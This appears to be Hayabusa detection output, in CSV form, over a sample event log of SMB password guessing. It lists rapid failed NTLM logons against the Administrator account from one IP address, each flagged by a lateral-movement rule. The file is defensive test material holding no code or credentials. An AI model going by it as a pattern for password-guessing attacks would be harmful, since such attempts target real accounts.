+2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yeONLdrrauxqvgaT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RFqSH4toadsTideV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HuMa0Juj1tjL6NDY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UA8zU0kJ6gAFqSaF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jvX85gF8wk3AGJyb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OpzOMKQIBrkQW5Os  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cqzrLAqHNi4CHT56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HWMap8qHlykO6Yeu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pkc9LWakJBjhBQv6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y43cE75gTzA1XjHF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9HopaYDAbYxHjJEr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: brNgudTWJaKs8nLd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MzPwOqU92kdGodBH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXlzxK5OXL9hpqrZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2cLdgWvrVh7h2jPk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h34xlYavVsXQRCYG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6wjflwqXyFzYTi0b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MlsuCSajqGUYTBWL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xQDdrQQZ5xYBDiRi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JX5NMuwUsOZEp3zh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JfrbGLqKGru8AE2a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 813natbodi6QauRW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KpfKxOZG3xSr5Yqm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fErWiEb0USDghXsB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fOWF6YnW8UEPlw41  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SNPXuHduatLFQc8W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 35rfur4MzKzwxCIn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VmAqzaZaeoSjcuh5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lKuCpuGcGmDOoewr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bz6SOAeTyqsBz6Oa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CSURiEoC7dw0w0ru  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bDjwkaHT8lrFmn9X  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ayI129HgVWA5q4Sk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jT2yiuOJS8Fvf9SD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1hpAO2UrjFd6Kxt0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZkgGj9Fnqn3XwnBT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WFXPYo0yzR7p8dNU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9j6MxN7PuM29Vlcq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w1CWIqoV6GzmmlRm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uiBfvnfTcIG4xJoi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dED7HYntoE5D7XvG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pX1ztnCKiePrPbTT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u3XQcfMHJDsBtJDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MhRsRIS5tHKLv2oL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JmkLhptugDU2fDWp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2yk62yREbgDCj9pB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6JPvkmaAsJlwn9t3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lhciP1zM9njlRI3j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: duNDenwdo1oHVuoL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0ChBZOYkTm1SguA1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RU38tuiKC0weexmb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jg0Hp4xtz0pAMhCz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5AorVNz5MgTeEvn2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8oJ6tVjBxlYyj5ej  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oEAEOi0TsSRVPlz4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: USfEwKkH8OUADVds  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y0jg1i6tDiInd10i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xv2jRzrgoP6lJdAJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LmuAXUwSkhR3tSRg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zy4Fkpvcrlmp9AES  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 51ipUXvrRh0CPH1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TB15XKzVJwIyjqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i1F6muFPBlPyHPbR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XNXwYS73RElHozUo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ft1MLPJISeq0bMsa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i8kbFOwQiCyRVMDV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ToPzuDEmXN1fjIcS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pKF1QKEuTXIGnrx2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fyHpo6pX8TEo6ttv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3uYqEt90yr8B3rK9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2LKkrM0slVn0CKHw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TyJ82cfaddnc8c6D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
